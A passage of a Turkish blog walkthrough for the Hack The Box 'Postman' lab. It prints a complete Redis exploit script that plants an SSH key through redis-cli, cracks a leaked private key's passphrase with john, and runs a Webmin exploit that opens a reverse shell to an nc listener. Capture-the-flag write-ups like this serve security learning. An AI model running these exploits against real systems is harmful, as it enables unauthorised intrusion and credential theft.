vulnerabilities.\n|_http-dombased-xss: Couldn&#039;t find any DOM based XSS.\n| http-litespeed-sourcecode-download: \n| Litespeed Web Server Source Code Disclosure (CVE-2010-2333)\n| \/index.php source code:\n| &lt;h1&gt;Error - Document follows&lt;\/h1&gt;\n|_&lt;p&gt;This web server is running in SSL mode. Try the URL &lt;a href=&#039;https:\/\/Postman:10000\/&#039;&gt;https:\/\/Postman:10000\/&lt;\/a&gt; instead.&lt;br&gt;&lt;\/p&gt;\n|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)\n| http-phpmyadmin-dir-traversal: \n|   VULNERABLE:\n|   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion\n|     State: UNKNOWN (unable to test)\n|     IDs:  CVE:CVE-2005-3299\n|       PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.\n|       \n|     Disclosure date: 2005-10-nil\n|     Extra information:\n|       ..\/..\/..\/..\/..\/etc\/passwd :\n|   &lt;h1&gt;Error - Document follows&lt;\/h1&gt;\n|   &lt;p&gt;This web server is running in SSL mode. Try the URL &lt;a href=&#039;https:\/\/Postman:10000\/&#039;&gt;https:\/\/Postman:10000\/&lt;\/a&gt; instead.&lt;br&gt;&lt;\/p&gt;\n|   \n|     References:\n|       http:\/\/www.exploit-db.com\/exploits\/1244\/\n|_      https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2005-3299\n| http-slowloris-check: \n|   VULNERABLE:\n|   Slowloris DOS attack\n|     State: LIKELY VULNERABLE\n|     IDs:  CVE:CVE-2007-6750\n|       Slowloris tries to keep many connections to the target web server open and hold\n|       them open as long as possible.  It accomplishes this by opening connections to\n|       the target web server and sending a partial request. By doing so, it starves\n|       the http server&#039;s resources causing Denial Of Service.\n|       \n|     Disclosure date: 2009-09-17\n|     References:\n|       http:\/\/ha.ckers.org\/slowloris\/\n|_      https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2007-6750\n|_http-stored-xss: Couldn&#039;t find any stored XSS vulnerabilities.\n| http-vuln-cve2006-3392: \n|   VULNERABLE:\n|   Webmin File Disclosure\n|     State: VULNERABLE (Exploitable)\n|     IDs:  CVE:CVE-2006-3392\n|       Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.\n|       This allows arbitrary files to be read, without requiring authentication, using &quot;..%01&quot; sequences\n|       to bypass the removal of &quot;..\/&quot; directory traversal sequences.\n|       \n|     Disclosure date: 2006-06-29\n|     References:\n|       http:\/\/www.exploit-db.com\/exploits\/1997\/\n|       https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2006-3392\n|_      http:\/\/www.rapid7.com\/db\/modules\/auxiliary\/admin\/webmin\/file_disclosure\n|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n<\/code><\/pre>\n<p>redis var bununla alakal\u0131 internetten biraz ara\u015ft\u0131rma yapt\u0131m ve (<a href=\"https:\/\/book.hacktricks.xyz\/pentesting\/6379-pentesting-redis\">https:\/\/book.hacktricks.xyz\/pentesting\/6379-pentesting-redis<\/a>) daha sonras\u0131nda github \u00fczerinde buldu\u011fum bir exploit ile ssh arac\u0131l\u0131\u011f\u0131 ile shell elde edebildim.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Postman]\n\u2514\u2500# wget https:\/\/raw.githubusercontent.com\/iw00tr00t\/Redis-Server-Exploit\/master\/redis.py                      130 \u2a2f\n--2021-08-13 09:03:19--  https:\/\/raw.githubusercontent.com\/iw00tr00t\/Redis-Server-Exploit\/master\/redis.py\nResolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.111.133, 185.199.109.133, ...\nConnecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 2051 (2.0K) [text\/plain]\nSaving to: \u2018redis.py.1\u2019\n\nredis.py.1                    100%[==============================================&gt;]   2.00K  --.-KB\/s    in 0s      \n\n2021-08-13 09:03:20 (9.55 MB\/s) - \u2018redis.py.1\u2019 saved [2051\/2051]\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Postman]\n\u2514\u2500# cat redis.py         \n#!\/usr\/bin\/python\n#Author : Avinash Kumar Thapa aka -Acid\n#Twitter : https:\/\/twitter.com\/m_avinash143\n#####################################################################################################################################################\n\nimport os\nimport os.path\nfrom sys import argv\nfrom termcolor import colored\n\nscript, ip_address, username = argv\n\nPATH=&#039;\/usr\/bin\/redis-cli&#039;\nPATH1=&#039;\/usr\/local\/bin\/redis-cli&#039;\n\ndef ssh_connection():\n    shell = &quot;ssh -i &quot; + &#039;$HOME\/.ssh\/id_rsa &#039; + username+&quot;@&quot;+ip_address\n    os.system(shell)\n\nif os.path.isfile(PATH) or os.path.isfile(PATH1):\n    try:\n        print(&#039;\\t*******************************************************************&#039;)\n        print(&#039;\\t* [+] [Exploit] Exploiting misconfigured REDIS SERVER*&#039;)\n        print(&#039;\\t* [+] AVINASH KUMAR THAPA aka &quot;-Acid&quot;                                &#039;)\n        print(&#039;\\t*******************************************************************&#039;)\n        print(&quot;\\n&quot;)\n        print(&quot;\\t SSH Keys Need to be Generated&quot;, &#039;blue&#039;)\n        os.system(&#039;ssh-keygen -t rsa -C \\&quot;acid_creative\\&quot;&#039;)\n        print(&quot;\\t Keys Generated Successfully&quot;, &quot;blue&quot;)\n        os.system(&quot;(echo &#039;\\r\\n\\&#039;; cat $HOME\/.ssh\/id_rsa.pub; echo  \\&#039;\\r\\n\\&#039;) &gt; $HOME\/.ssh\/public_key.txt&quot;)\n        cmd = &quot;redis-cli -h &quot; + ip_address + &#039; flushall&#039;\n        cmd1 = &quot;redis-cli -h &quot; + ip_address\n        os.system(cmd)\n        cmd2 = &quot;cat $HOME\/.ssh\/public_key.txt | redis-cli -h &quot; +  ip_address + &#039; -x set cracklist&#039;\n        os.system(cmd2)\n        cmd3 = cmd1 + &#039; config set dbfilename &quot;backup.db&quot; &#039;\n        cmd4 = cmd1 + &#039; config set  dir&#039; + &quot; \/home\/&quot;+username+&quot;\/.ssh\/&quot;\n        cmd5 = cmd1 + &#039; config set dbfilename &quot;authorized_keys&quot; &#039;\n        cmd6 = cmd1 + &#039; save&#039;\n        os.system(cmd3)\n        os.system(cmd4)\n        os.system(cmd5)\n        os.system(cmd6)\n        print(&quot;\\tYou&#039;ll get shell in sometime..Thanks for your patience&quot;)\n        ssh_connection()\n\n    except:\n        print(&quot;Something went wrong&quot;)\nelse:\n    print(&quot;\\tRedis-cli:::::This utility is not present on your system. You need to install it to proceed further.&quot;)\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Postman]\n\u2514\u2500# python3 redis.py 10.10.10.160 redis                                                                          1 \u2a2f\n    *******************************************************************\n    * [+] [Exploit] Exploiting misconfigured REDIS SERVER*\n    * [+] AVINASH KUMAR THAPA aka &quot;-Acid&quot;                                \n    *******************************************************************\n\n     SSH Keys Need to be Generated blue\nGenerating public\/private rsa key pair.\nEnter file in which to save the key (\/root\/.ssh\/id_rsa): \n\/root\/.ssh\/id_rsa already exists.\nOverwrite (y\/n)? y\nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in \/root\/.ssh\/id_rsa\nYour public key has been saved in \/root\/.ssh\/id_rsa.pub\nThe key fingerprint is:\nSHA256:P0ijaFQYFMCGMh3gzzo+VvrFe4txspauc15pLpVjeEI acid_creative\nThe key&#039;s randomart image is:\n+---[RSA 3072]----+\n|.=o++.           |\n|= +  o           |\n|.+  . .          |\n|  o  E           |\n|   oo . S        |\n|  .o.+ O.+       |\n| oo o=B=o o      |\n|.+.o.=@.   .     |\n|..ooB*oo.        |\n+----[SHA256]-----+\n     Keys Generated Successfully blue\nOK\nOK\nOK\n(error) ERR Changing directory: Permission denied\nOK\nOK\n    You&#039;ll get shell in sometime..Thanks for your patience\nWelcome to Ubuntu 18.04.3 LTS (GNU\/Linux 4.15.0-58-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n * Canonical Livepatch is available for installation.\n   - Reduce system reboots and improve kernel security. Activate at:\n     https:\/\/ubuntu.com\/livepatch\nLast login: Mon Aug 26 03:04:25 2019 from 10.10.10.1\nredis@Postman:~$ id\nuid=107(redis) gid=114(redis) groups=114(redis)\nredis@Postman:~$ <\/code><\/pre>\n<p>Enum yaparken linpeas.sh'\u0131 kulland\u0131m ve bir id_rsa dosyas\u0131 ke\u015ffettim. Bu dosya Matt kullan\u0131c\u0131s\u0131na aitti.<\/p>\n<pre><code class=\"language-sh\">\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Analyzing SSH Files (limit 70)\nid_dsa* Not Found\n\n-rwxr-xr-x 1 Matt Matt 1743 Aug 26  2019 \/opt\/id_rsa.bak\n-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C\nJehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw\/pr3L2A2NDtB7tvsXNyqKDghfQnX\ncwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2\n7GsTwsMvKzXkkfEZQaXK\/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6\ncdnCWhzkA\/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9\n1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv\nEyvlWwks7R\/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP\nUH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng\/sLJnJ729zb3kuym8r+hU+9v6VY\nSj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK\nt+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN\/OBoPPOTaBVD9i6fsoZ6pwnS\n5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke\nP2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7\/McQECb5sf+O6\njKE3Jfn0UVE2QVdVK3oEL6DyaBf\/W2d\/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge\nSbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ\/vFZC5YIsQ+9sl89TmJHL74Y3i\nl3YXDEsQjhZHxX5X\/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X\n0VIWrskPK4I7IH5gbkrxVGb\/9g\/W2ua1C3Nncv3MNcf0nlI117BS\/QwNtuTozG8p\nS9k3li+rYr6f3ma\/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR\nhkuzUuH9z\/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+\nZxy0tIPwjCZvxUfYn\/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V\nXTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD\nb6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf\/q7MGrO3cF25k1PEWNyZMqY4WYsZXi\nWhQFHkFOINwVEOtHakZ\/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh\nKTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm\nnpAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ\nVcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+\/h5CQwsF+JRg88bnxh2z2BD6i5W\nX+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==\n-----END RSA PRIVATE KEY-----\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\nredis@Postman:\/var\/backups$ cd \/opt\nredis@Postman:\/opt$ ls\ntotal 12\ndrwxr-xr-x  2 root root 4096 Sep 11  2019 .\ndrwxr-xr-x 22 root root 4096 Sep 30  2020 ..\n-rwxr-xr-x  1 Matt Matt 1743 Aug 26  2019 id_rsa.bak\n<\/code><\/pre>\n<p>Dosyay\u0131 kalimde d\u00fczenledim ve kullanmay\u0131 denedi\u011fimde \u015fifreli oldu\u011funu g\u00f6rd\u00fcm.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Postman]\n\u2514\u2500# cat id_rsa                                                                                                 130 \u2a2f\n-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C\n\nJehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw\/pr3L2A2NDtB7tvsXNyqKDghfQnX\ncwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2\n7GsTwsMvKzXkkfEZQaXK\/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6\ncdnCWhzkA\/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9\n1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv\nEyvlWwks7R\/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP\nUH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng\/sLJnJ729zb3kuym8r+hU+9v6VY\nSj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK\nt+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN\/OBoPPOTaBVD9i6fsoZ6pwnS\n5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke\nP2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7\/McQECb5sf+O6\njKE3Jfn0UVE2QVdVK3oEL6DyaBf\/W2d\/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge\nSbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ\/vFZC5YIsQ+9sl89TmJHL74Y3i\nl3YXDEsQjhZHxX5X\/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X\n0VIWrskPK4I7IH5gbkrxVGb\/9g\/W2ua1C3Nncv3MNcf0nlI117BS\/QwNtuTozG8p\nS9k3li+rYr6f3ma\/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR\nhkuzUuH9z\/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+\nZxy0tIPwjCZvxUfYn\/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V\nXTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD\nb6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf\/q7MGrO3cF25k1PEWNyZMqY4WYsZXi\nWhQFHkFOINwVEOtHakZ\/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh\nKTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm\nnpAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ\nVcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+\/h5CQwsF+JRg88bnxh2z2BD6i5W\nX+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==\n-----END RSA PRIVATE KEY-----\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Postman]\n\u2514\u2500# ssh Matt@10.10.10.160 -i id_rsa\nEnter passphrase for key &#039;id_rsa&#039;: \n<\/code><\/pre>\n<p>john ile k\u0131rmay\u0131 denedim.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Postman]\n\u2514\u2500# john id_rsa.hash --wordlist=\/usr\/share\/wordlists\/rockyou.txt                                                 1 \u2a2f\nUsing default input encoding: UTF-8\nLoaded 1 password hash (SSH [RSA\/DSA\/EC\/OPENSSH (SSH private keys) 32\/64])\nCost 1 (KDF\/cipher [0=MD5\/AES 1=MD5\/3DES 2=Bcrypt\/AES]) is 1 for all loaded hashes\nCost 2 (iteration count) is 2 for all loaded hashes\nWill run 4 OpenMP threads\nNote: This format may emit false positives, so it will keep trying even after\nfinding a possible candidate.\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\ncomputer2008     (id_rsa)\nWarning: Only 2 candidates left, minimum 4 needed for performance.\n1g 0:00:00:09 DONE (2021-08-13 10:08) 0.1066g\/s 1528Kp\/s 1528Kc\/s 1528KC\/sa6_123..*7\u00a1Vamos!\nSession completed\n<\/code><\/pre>\n<p>Ancak giri\u015f yaparken direkt olarak ba\u011flant\u0131 kopuyordu... Bunun sebebi <strong> \/etc\/ssh\/sshd_config<\/strong> dosyas\u0131nda gizli...<\/p>\n<pre><code>#MaxStartups 10:30:100\n#PermitTunnel no\n#ChrootDirectory none\n#VersionAddendum none\n\n#deny users\nDenyUsers Matt\n\n# no default banner path\n#Banner none<\/code><\/pre>\n<p>Bende normal terminal \u00fczerinden denedim.<\/p>\n<pre><code class=\"language-sh\">redis@Postman:\/tmp$ su Math\nNo passwd entry for user &#039;Math&#039;\nredis@Postman:\/tmp$ \nredis@Postman:\/tmp$ \nredis@Postman:\/tmp$ su Matt\nPassword: \nMatt@Postman:\/tmp$ \n\nMatt@Postman:\/home$ cd Matt\/\nMatt@Postman:~$ ls\ntotal 52\ndrwxr-xr-x 6 Matt Matt 4096 Sep 11  2019 .\ndrwxr-xr-x 3 root root 4096 Sep 11  2019 ..\n-rw------- 1 Matt Matt 1676 Sep 11  2019 .bash_history\n-rw-r--r-- 1 Matt Matt  220 Aug 25  2019 .bash_logout\n-rw-r--r-- 1 Matt Matt 3771 Aug 25  2019 .bashrc\ndrwx------ 2 Matt Matt 4096 Aug 25  2019 .cache\ndrwx------ 3 Matt Matt 4096 Aug 25  2019 .gnupg\ndrwxrwxr-x 3 Matt Matt 4096 Aug 25  2019 .local\n-rw-r--r-- 1 Matt Matt  807 Aug 25  2019 .profile\n-rw-rw-r-- 1 Matt Matt   66 Aug 26  2019 .selected_editor\ndrwx------ 2 Matt Matt 4096 Aug 26  2019 .ssh\n-rw-rw---- 1 Matt Matt   33 Aug 13 13:57 user.txt\n-rw-rw-r-- 1 Matt Matt  181 Aug 25  2019 .wget-hsts\nMatt@Postman:~$ cat user.txt \na8b2850f9332c0132ab8c7efc7718680<\/code><\/pre>\n<p>Enum yapmaya devam ederken root yetkilerde \u00e7al\u0131\u015fan process'leri kontrol ettim.<\/p>\n<pre><code>\n[*] pro020 Processes running with root permissions......................... yes!\n---\nSTART      PID     USER COMMAND\n15:57    53954     root \/usr\/share\/webmin\/webmincron\/webmincron.pl\n15:57    47223     root sudo -S -l\n15:46    30788     root su Matt\n13:57      724     root \/usr\/bin\/perl \/usr\/share\/webmin\/miniserv.pl \/etc\/webmin\/miniserv.conf\n13:57      644     root \/usr\/sbin\/apache2 -k start\n13:57      638     root \/sbin\/agetty -o -p -- \\u --noclear tty1 linux\n13:57      611     root \/usr\/sbin\/sshd -D\n13:57      350     root \/usr\/lib\/accountsservice\/accounts-daemon\n13:57      349     root \/usr\/sbin\/cron -f\n13:57      348     root \/lib\/systemd\/systemd-logind\n13:57      347     root \/usr\/bin\/python3 \/usr\/bin\/networkd-dispatcher --run-startup-triggers\n13:57      330     root \/usr\/bin\/vmtoolsd\n13:57      327     root \/usr\/bin\/VGAuthService\n13:57      249     root \/lib\/systemd\/systemd-udevd\n13:57      227     root \/lib\/systemd\/systemd-journald\n13:57        1     root \/sbin\/init splash<\/code><\/pre>\n<p>Webminde elde etti\u011fim Matt kullan\u0131c\u0131s\u0131n\u0131 denedi\u011fimde ba\u015far\u0131l\u0131 oldum. Bunun \u00fczerine internette exploit var m\u0131d iye aramaya ba\u015flad\u0131m. <a href=\"https:\/\/github.com\/roughiz\/Webmin-1.910-Exploit-Script\">https:\/\/github.com\/roughiz\/Webmin-1.910-Exploit-Script<\/a> adresindeki exploiti kulland\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Postman\/Webmin-1.910-Exploit-Script]\n\u2514\u2500# python webmin_exploit.py --rhost 10.10.10.160 --rport 10000 --lhost 10.10.14.12 --lport 1111 -u Matt -p computer2008 -s True\n****************************** Webmin 1.910 Exploit By roughiz*******************************\n*********************************************************************************************\n*********************************************************************************************\n*********************************************************************************************\n****************************** Retrieve Cookies sid *****************************************\n\n********** [+] [Exploit] The Cookie is 65b57a92d193aa2574a509b6706cc2aa\n\n********************************************************************************************\n****************************** Create payload and Exploit ***********************************\n\n********** [+] [Exploit] Verify you nc listener on port 1111 for the incomming reverse shell\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Postman\/Webmin-1.910-Exploit-Script]\n\u2514\u2500# nc -lvp 1111                                                                                                 1 \u2a2f\nlistening on [any] 1111 ...\nconnect to [10.10.14.12] from Postman [10.10.10.160] 42440\nls \/root\nredis-5.0.0\nroot.txt\ncat \/root\/root.txt\n745eb382730474e84e231084b43b2bfb\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Makine Ad\u0131 Seviye OS Logo Postman &#8211; HTB Kolay Linux Walkthrough nmap taramas\u0131 ile ba\u015flayal\u0131m. PORT STATE SERVICE VERSION 22\/tcp open ssh OpenSSH 7.6p1 Ubuntu&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/08\/13\/postman\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">Postman<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[606,607],"class_list":["post-1507","post","type-post","status-publish","format-standard","hentry","category-walkthrough","tag-redis","tag-webmin","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1507","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1507"}],"version-history":[{"count":2,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1507\/revisions"}],"predecessor-version":[{"id":1510,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1507\/revisions\/1510"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1507"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1507"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1507"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}